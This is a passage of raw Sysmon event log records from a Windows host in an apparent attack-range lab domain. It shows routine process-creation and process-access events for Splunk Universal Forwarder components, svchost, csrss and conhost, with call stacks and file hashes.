Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030279Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:09.543{7901BC46-54F1-6008-D706-00000000A301}6840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030296Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:10.355{7901BC46-54F2-6008-D806-00000000A301}68527492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030295Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:10.214{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-54F2-6008-D806-00000000A301}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030294Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:10.214{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030293Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:10.214{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030292Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:10.214{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030291Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:10.214{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030290Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:10.214{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-54F2-6008-D806-00000000A301}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030289Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:10.214{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-54F2-6008-D806-00000000A301}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030288Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:10.215{7901BC46-54F2-6008-D806-00000000A301}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030313Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:11.683{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-54F3-6008-DA06-00000000A301}8144C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030312Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:11.683{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030311Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:11.683{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030310Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:11.683{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030309Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:11.683{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030308Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:11.683{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-54F3-6008-DA06-00000000A301}8144C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030307Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:11.683{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-54F3-6008-DA06-00000000A301}8144C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030306Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:11.684{7901BC46-54F3-6008-DA06-00000000A301}8144C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030305Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:11.168{7901BC46-54F3-6008-D906-00000000A301}60845928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030304Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:11.011{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-54F3-6008-D906-00000000A301}6084C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030303Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:11.011{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030302Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:11.011{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030301Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:11.011{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030300Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:11.011{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030299Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:11.011{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-54F3-6008-D906-00000000A301}6084C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030298Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:11.011{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-54F3-6008-D906-00000000A301}6084C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030297Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:11.012{7901BC46-54F3-6008-D906-00000000A301}6084C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030316Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:06:48.744{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030315Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 